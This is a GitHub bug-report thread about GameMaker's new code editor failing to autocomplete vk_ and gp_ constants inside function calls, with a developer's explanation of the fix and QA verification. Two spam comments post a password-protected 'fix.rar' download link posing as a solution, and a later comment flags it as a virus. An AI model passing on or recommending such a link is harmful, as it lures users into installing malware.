### ISSUE TITLE
Code Editor 2, vk_ and gp_ do not autocomplete in appropriate functions

### ISSUE THREAD

**Issue by BifDog** [YoYoGames/GameMaker-Bugs#7433]
### Description

In the new code editor, the "vk" keys never autocomplete in functions they are used in.  so if i type keyboard_Check( vk..... there is no autocomplete.   but if i just type vk on a line by itself, there is autocomplete.  the same apples to gamepad_button_check() etc

### Steps To Reproduce

1. Start GameMaker
2. in code editor 2, type keyboard_check(vk_
3. note there is no autocomplete
4. See the issue

### How reliably can you recreate this issue using your steps above?

Always

### Which version of GameMaker are you reporting this issue for?

2024.800 (Betas)

### Which operating system(s) are you seeing the problem on?

Windows 11

### Are you running GameMaker from inside your Steam library?

No

### Contact Us Package Attached?

- [X] I have attached my Contact Us Package

### Sample Project Added?

- [ ] I have included a small sample project

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YoungAgile** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

Virus, please do not click on the link

**Comment by zreedy** [comment]
Fixed. The previous behavior did not support parameters with composite types and downcasted to Any. This essentially resulted in all possible matches being returned rather than anything useful for something like `keyboard_check`. Additionally, if a parameter accepts a constant then all constants of that class will be surfaced preferentially over other results. (e.g. `draw_set_valign` will show `fa_bottom`, `fa_middle`, `fa_top` first, followed by a function `draw_get_valign` which returns the constant class, followed by built-in variables which are of type Real (which is promotable to `Constant.VerticalAlign`, but not preferentially)

**Comment by zreedy** [comment]
Additionally, a related bug where the Additional Information Tooltip shown in the Code Completion List Items incorrectly specified the type of constants as `Real` instead of `Constant.VirtualKey`, etc.

**Comment by scott-dunbar** [comment]
Verified fixed in  IDE v2024.1100.0.625  Runtime v2024.1100.0.651
